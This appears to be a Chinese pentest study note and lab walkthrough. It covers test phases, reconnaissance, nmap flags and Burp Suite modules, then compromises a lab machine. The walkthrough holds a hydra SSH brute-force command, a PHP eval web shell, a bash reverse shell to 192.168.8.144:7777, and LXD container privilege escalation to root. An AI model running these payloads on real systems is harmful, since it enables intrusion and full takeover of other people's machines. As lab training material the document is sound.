目录

理论渗透测试流程以及每个阶段需要做的事情信息收集需要收集的内容，以及收集的方式NMAP有哪些功能（写出参数）Burpsuite有哪些功能模块（详细说明）实战暴力破解得到反弹shelllxd提权

理论

渗透测试流程以及每个阶段需要做的事情

与客户确认测试范围——获得授权书——信息收集——漏洞挖掘——漏洞利用——后渗透——痕迹清除——生成渗透测试报告项目启动：事先与客户沟通，测试事项、获得授权、保密协议测试对象和范围，测试环境，测试方式黑盒白盒灰盒， 是否包括破坏性测试项目准备：编写测试方案，测试工具和应急预案，测试实施：信息收集、脆弱性测试、问题验证、关联数据收集测试汇报：测试数据、问题汇总、解决措施、测试报告、汇报PPT

信息收集需要收集的内容，以及收集的方式

信息收集的方式可以分为两种：主动和被动。

主动信息收集：通过直接访问、扫描网站，这种流量将流经网站

被动信息收集：利用第三方的服务对目标进行访问了解，比例：Google搜索、Shodan搜索等。

信息收集方式：扫描（端口扫描、漏洞扫描）、公开信息（搜索引擎、网站、论坛、媒体报道、微步社区、潮汐指纹、站长之家、子域名挖掘、备案号）、其他方式（钓鱼邮件、社工）

搜集的内容：

（1）端口

一个网站可能会开放多个不同的端口，而我们可以通过同一网站的不同端口进行测试，扫描开放端口的方法有很多，这里我分为两种：第一种在线端口扫描，第二种利用工具扫描端口。比较常见的在线端口扫描网站有：在线端口扫描,IP/服务器端口在线扫描-、在线端口检测,端口扫描,端口开放检查-在线工具-postjson等；端口扫描工具有nmap，goby等。

（2）子域名

目标的子域是一个重要的测试点，你收集到的可用的子域名越多，意味着你的机会也就越多，所以说要尽可能的收集目标的子域名。子域名的收集方法有很多，这里我分为两种：第一种在线子域名收集。第二种利用工具进行子域名收集。比较常见的在线子域名搜索（爆破）的网站有：在线子域名爆破-子成君提供、在线子域名查询等；子域名扫描工具有oneforall、layer子域名挖掘机、SubDomainsBrute等。

（3）C段旁注

当我们 对于目标主机无计可施时，我们可以尝试一下从C段或者旁注入手。C段入侵是拿下同一C段下的服务器，也就是说是D段1-255中的一台服务器，然后直接从被端掉的服务器出发进行其他测试；旁注的意思就是从同台服务器上的其他网站入手，提权，然后把服务器拿下了，就自然把那个网站拿下了。两者的区别：C段：同网段不同服务器，旁注：同服务器不同站点。C段旁注扫描：同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具

（4）目录（敏感信息）

目录扫描也是一个渗透测试的重要点，如果你能从目录中找到一些敏感信息，那么你的渗透过程就会轻松很多。例如扫描出后台，源码，robots.txt的敏感目录或者敏感信息。目录扫描我分为两种：一种时在线目录扫描，一种是利用工具扫描目录。

在线目录扫描可以使用Google语法然后利用我们平时用的搜索引擎（搜狗，百度，bing，Google等）进行搜索。

NMAP有哪些功能（写出参数）

nmap -sn -T4 192.168.8.0/24//-sn扫描这个网段的IP -T设置扫描速度级别最大为5最快nmap -A 192.168.8.156// -A是完全扫描-v 输出扫描过程-sV 扫描系统和服务版本-O 扫描操作系统版本–version-light做轻量级扫描-sS syn半开放扫描-sU UDP 扫描-p 指定端口范围，默认扫描1000个端口-Pn不做ping扫描-sn只做ping扫描，不做端口扫描-F fast模式，只扫描常见服务端口，比默认端口少

Burpsuite有哪些功能模块（详细说明）

1.Target(目标)——显示目标目录结构的的一个功能2.Proxy(代理)——拦截HTTP/S的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。3.Spider(蜘蛛)——应用智能感应的网络爬虫，它能完整的枚举应用程序的内容和功能。4.Scanner(扫描器)——高级工具，执行后，它能自动地发现web 应用程序的安全漏洞。5.Intruder(入侵)——一个定制的高度可配置的工具，对web应用程序进行自动化攻击，如：枚举标识符，收集有用的数据，以及使用fuzzing 技术探测常规漏洞。6.Repeater(中继器)——一个靠手动操作来触发单独的HTTP 请求，并分析应用程序响应的工具。7.Sequencer(会话)——用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。8.Decoder(解码器)——进行手动执行或对应用程序数据者智能解码编码的工具。9.Comparer(对比)——通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。10.Extender(扩展)——可以让你加载Burp Suite的扩展，使用你自己的或第三方代码来扩展Burp Suit的功能。11.Options(设置)——对Burp Suite的一些设置。

实战

暴力破解得到反弹shell

首先利用nmap扫描网段，判断靶机的IP

nmap -sn 192.168.8.0/24

找到IP后，继续扫描其开放端口，有22（ssh）、80、8080可以尝试用hydra进行ssh爆破（实测不行，需要有强大的字典）

nmap -A -T4 192.168.8.156

利用hydra进行ssh爆破hydra -l joker -P /root/fwq.txt -t 6 ssh://192.168.8.156

dirb http://192.168.8.156/探测该网站下的文件目录名，登录查看只是网站的源码和图片算低危的信息泄露

可以使用御剑进行扫描

8080端口也开放，尝试利用burp抓包进行用户名密码的爆破

利用burp和kali中的rock密码字典进行密码爆破

得到正确密码为hannah

登陆成功可以发现该网站是由joomla架构，尝试使用默认账号密码joomla

可以看到这是他网站的一些模板

新建111.php写入木马，利用菜刀或者蚁剑进行链接

<?php @eval($_POST['yyy']); ?>

也可以双击打开终端

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.8.144/7777 0>&1'");?>或者写入反弹shell

kali开启监听，访问我们写的yyshell.php文件

lxd提权

想要提升为root权限，我们需要给靶机挂载一个lxd镜像。可以在kali或者自己的服务器上从github下载build-alpine文件，然后执行build-alpine这个shell脚本。“build-alpine”，将以压缩文件的形式构建最新的Alpine镜像，最后我们需要在靶机中下载这个镜像

git clone /saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine生成一个tar.gz文件切换到tmp目录下

上传镜像

python -m SimpleHTTPServer

wget http://192.168.8.144:8000/alpine-v3.13-x86_64-0218_0139.tar.gz靶机切换到tmp下执行

依次运行命令

lxc init joker ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

提权成功，进入容器之后，定位到/mnt/root即可查看目标主机资源，即可查看final.txt